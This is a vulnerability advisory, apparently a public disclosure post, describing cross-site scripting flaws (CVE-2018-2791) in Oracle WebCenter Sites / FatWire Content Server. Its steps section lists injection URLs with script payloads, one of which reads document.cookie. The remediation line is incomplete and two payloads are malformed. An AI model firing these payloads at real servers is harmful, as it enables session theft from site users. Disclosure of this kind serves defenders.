Oracle WebCenter versions 7.x prior to 11gR1 suffer from multiple cross site scripting vulnerabilities.
f3b2a6ff308869a19a7de037bfd7c7d7
# Application: Oracle WebCenter Sites (FatWire Content Server)
# Versions Affected: 7.x < 11gR1
# Vendor URL: http://oracle.com
# Bugs: Multiple XSS Oracle WebCenter Sites (FatWire Content Server) 7.x <
11gR1
# Sent: 18.12.2017
# Reported: 18.12.2017
# Date of Public Advisory: 14.04.2018
# Reference: Oracle Security Note S0932669
# Author: Richard Alviarez (SIA Group)
Description
1. #+# ADVISORY INFORMATION
Title: Multiple XSS Oracle WebCenter Sites (FatWire Content Server) 7.x <
11gR1
Advisory ID: S0932669
Risk: High
Date published: 15.04.2018
Vendors contacted: Oracle
2. #+# VULNERABILITY INFORMATION
Class: Authorization
Impact: Information leakage
Remotely Exploitable: Yes
Locally Exploitable: No
CVE: CVE-2018-2791
CVSS Information
* CVSSv3 Base Score: 8.2
* CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
3. #+# VULNERABILITY DESCRIPTION
The backend of the Content Server is prone to permanent and reflected
Cross-Site Scripting attacks. The vulnerability can be used to include
HTML- or JavaScript code to the affected web page. The code is executed
in the browser of users if they visit the manipulated site.
The vulnerability can be used to change the contents of the displayed
site,
redirect to other sites or steal user credentials. Additionally, Portal
users are potential victims of browser exploits and JavaScript Trojans.
4. #+# VULNERABLE PACKAGES
Multiple XSS Oracle WebCenter Sites (FatWire Content Server) 7.x < 11gR1
Other versions are probably affected too, but they were not checked.
5. #+# SOLUTIONS AND WORKAROUNDS
To fix the vulnerability, upgrade to version.
6. #+# AUTHOR
Richard Alviarez (SIA Group)
7. #+# TECHNICAL DESCRIPTION
A possible attacker can take advantage of the vulnerability to inject
javascript code
in order to perform several attack vectors, such as identity theft (cookie
theft), redirection
to malicious external sites, phishing attacks among others.
Steps to exploit this vulnerability
1. Open https://WEB/servlet/Satellite?c=Noticia&cid={ID}&pagename=
OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=
eee%22%3E%3Cscript%3Ealert(123)%3C/script%3E%3C
<https://WEB/servlet/Satellite?c=Noticia&cid=%7BID%7D&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=eee%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E%3C>
Note: {ID} Change for ID to site example (1362484193835)
Other vulnerable parameters:
2. servlet/Satellite?c=Noticia&cid={ID}&pagename=OpenMarket/
Gator/FlexibleAssets/AssetMaker/confirmmakeasset&
cs_imagedir=eee"<scriptalert(document.cookie)</script
3. servlet/Satellite?destpage="<h1xxx<scriptalert(1)</script&
pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError
#+# Collaborators
- CuriositySec
- Victor
- Vis0r
- Oxd0m7